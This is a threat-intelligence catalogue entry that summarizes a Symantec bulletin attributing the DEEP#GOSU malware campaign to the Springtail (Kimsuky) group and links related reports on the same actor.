New DEEP#GOSU campaign attributed to Springtail APT (aka Kimsuky)

2024-03-20 • Symantec •

https://www.broadcom.com/support/security-center/protection-bulletin/new-deep-gosu-campaign-attributed-to-springtail-apt-aka-kimsuky

#Springtail

Symantec attributes the DEEP#GOSU campaign to Springtail, also known as Kimsuky or Thallium. The attack chain uses .LNK files, embedded PowerShell, and VBScript stagers to download payloads hosted on Dropbox. The final malware combines infostealer and backdoor functions, including clipboard monitoring, keylogging, and data exfiltration. The source identifies Symantec’s CL.Downloader!gen241 detection and notes that observed domains and IPs are covered through WebPulse security categories.

Related Actors

Springtail

Symantec

Kimsuky

First seen: Mar 2024

Last seen: May 2026

Related Reports

2024-03-21 • 90% Match

Springtail APT group abuses valid certificate of known Korean public entity

Symantec

#Springtail

Shares tag: Springtail • Same author: Symantec • Published within a week

2024-05-16 • 80% Match

Springtail: New Linux Backdoor Added to Toolkit

Symantec

#TrollStealer #GoBear #Gomir #Springtail

Shares tag: Springtail • Same author: Symantec

2025-04-07 • 70% Match

Springtail APT group targets South Korean government entities

Symantec

#LNK #Springtail

Shares tag: Springtail • Same author: Symantec

2026-05-14 • 60% Match

Disclosing new PebbleDash-based tools by Kimsuky

Kaspersky

#Kimsuky #Phishing #AppleSeed #PebbleDash #BlackBanshee #VelvetChollima #GitHub #ADS #APT43 #RubySleet #Springtail #HappyDoor #JSE #SparklingPisces #HttpTroy #VSCode #T1059.003 #T1005 #T1041 #T1113 #T1071.001 #T1056.001 #T1027 #T1566.001 #T1547.001 #T1053.005 #T1059.001 #T1105 #T1219 #T1543.003

Shares tag: Springtail

« Back